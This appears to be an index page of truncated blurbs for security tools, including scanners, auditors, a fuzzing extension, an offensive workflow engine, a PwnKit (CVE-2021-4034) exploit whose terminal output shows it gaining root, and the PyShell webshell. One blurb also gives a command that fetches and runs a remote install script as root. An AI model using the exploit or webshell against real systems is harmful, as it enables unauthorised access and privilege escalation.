WSVuls : Website Vulnerability Scanner Detect Issues
.png "WSVuls : Website Vulnerability Scanner Detect Issues")
WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It's designed for developers/testers and for those workers in IT who want to test vulnerabilities and analyses website from a single command. It detects issues outdated software version, insecures HTTP headers, the long and useless requests Why WSVuls ? WSVuls can extract the following data while crawling: Cloudflare...
Scanmycode-Ce : Code Scanning/SAST/Static Analysis/Linting Using Many tools/Scanners
Scanmycode-Ce is a Code Scanning/SAST/Static Analysis/Linting solution using many tools/Scanners with One Report. You can also add any tool to it. Currently, it supports many languages and tech stacks. Similar to SonarQube, but it is different. TLDR To install it. Install docker and docker-compose and then: 2 options Fastest (use DockerHub built images). If unsure, use this. git clone https://github.com/marcinguy/scanmycode-ce.gitcd scanmycode-ce/dockerhub./start.sh Slower (build everything) git clone https://github.com/marcinguy/scanmycode-ce.gitcd scanmycode-ce/docker./start.sh Go in the...
Master_Librarian : A Tool To Audit Unix/*BSD/Linux System Libraries To Find Public Security Vulnerabilities
Master_Librarian is a simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities. To install requirements: $ sudo python3 -m pip install -r requirements.txt Overview: $ python3 master_librarian.py -hMaster librarian v0.3Tool to search public vulnerabilities on local librariesby CoolerVoidExample:$ python3 master_librarian.py -t csv$ python3 master_librarian.py -t txt -l 3usage: master_librarian.py -t TYPES optional arguments:-h, --help show this help message and...
GONET-Scanner : Golang Network Scanner With Arp Discovery And Own Parser
.png "GONET-Scanner : Golang Network Scanner With Arp Discovery And Own Parser")
GONET-Scanner tool has its own ARP scanner and parser facility. ScreenShots Install chmod +x install.sh./install.sh Usage -ar CIDR: ARP Discovery-ar CIDR -s: Scan ports in all hosts discovered-ap: Scan to 65535 Ports-pr MINPORT MAXPORT: Define Port Range to Scan-1000: Scan Top 1000 ports (like nmap)-t: Set Timeout (in milliseconds)go run scannerport.go -ap : Allports TCP Scango run scannerport.go Default Scan 0-1024 portsgo run...
Geowifi : Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases
Geowifi is a tool to Search WiFi geolocation data by BSSID and SSID on different public databases. Databases WigleAppleOpenWifiMilnikov Prerequisites Python3.In order to display emojis on Windows, it is recommended to install the new Windows terminal. In order to use the Wigle service it is necessary to obtain an API and configure the utils/API.yaml file replacing the value of the "wigle_auth" parameter for the "Encoded for use" data provided by Wigle. This...
GraphQL Cop : Security Auditor Utility For GraphQL APIs
.png "GraphQL Cop : Security Auditor Utility For GraphQL APIs")
GraphQL Cop is a small Python utility to run common security tests against GraphQL APIs. GraphQL Cop is perfect for running CI/CD checks in GraphQL. It is lightweight, and covers interesting security issues in GraphQL. GraphQL Cop allows you to reproduce the findings by providing cURL commands upon any identified vulnerabilities. Requirements Python3Requests Library Detections Alias Overloading (DoS)Batch Queries (DoS)GET based Queries (CSRF)GraphQL Tracing...
Fastfuz-Chrome-Ext : Site Fast Fuzzing With Chorme Extension
.png "Fastfuz-Chrome-Ext : Site Fast Fuzzing With Chorme Extension")
Fastfuz-Chrome-Ext is a Fast fuzzing websites with chrome extension. Screenshot Install Add Your Custom Files Open files.txtPaste your file or directory name in line by lineHappy Hunting Download
Osmedeus : A Workflow Engine For Offensive Security
.png "Osmedeus : A Workflow Engine For Offensive Security"){kind=spacer}
Osmedeus is a Workflow Engine for Offensive Security. Installation NOTE that you need some essential tools like curl, wget, git, zip and login as root to start bash -c "$(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)" Build the engine from source Make sure you installed golang >= v1.17 mkdir -p $GOPATH/src/github.com/j3ssiegit clone --depth=1 https://github.com/j3ssie/osmedeus $GOPATH/src/github.com/j3ssie/osmedeuscd $GOPATH/src/github.com/j3ssie/osmedeusmake build Usage Scan Usage:osmedeus scan -f -t osmedeus scan -m -T osmedeus scan -f /path/to/flow.yaml -t osmedeus scan...
PwnKit-Exploit : Proof Of Concept (PoC) CVE-2021-4034
.png "PwnKit-Exploit : Proof Of Concept (PoC) CVE-2021-4034")
PwnKit-Exploit, a local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. Proof of Concept debian@debian:~/PwnKit-Exploit$ makecc -Wall exploit.c -o exploitdebian@debian:~/PwnKit-Exploit$ whoamidebiandebian@debian:~/PwnKit-Exploit$ ./exploitCurrent User before execute exploithacker@victim$whoami: debianExploit written by @luijait (0x6c75696a616974) Enjoy your root if exploit was completed succesfullyroot@debian:/home/debian/PwnKit-Exploit# whoamirootroot@debian:/home/debian/PwnKit-Exploit# Fix CommandUsesudo chmod 0755...
PyShell : Multiplatform Python WebShell
.png "PyShell : Multiplatform Python WebShell")
PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server. Thanks to this, you can use...
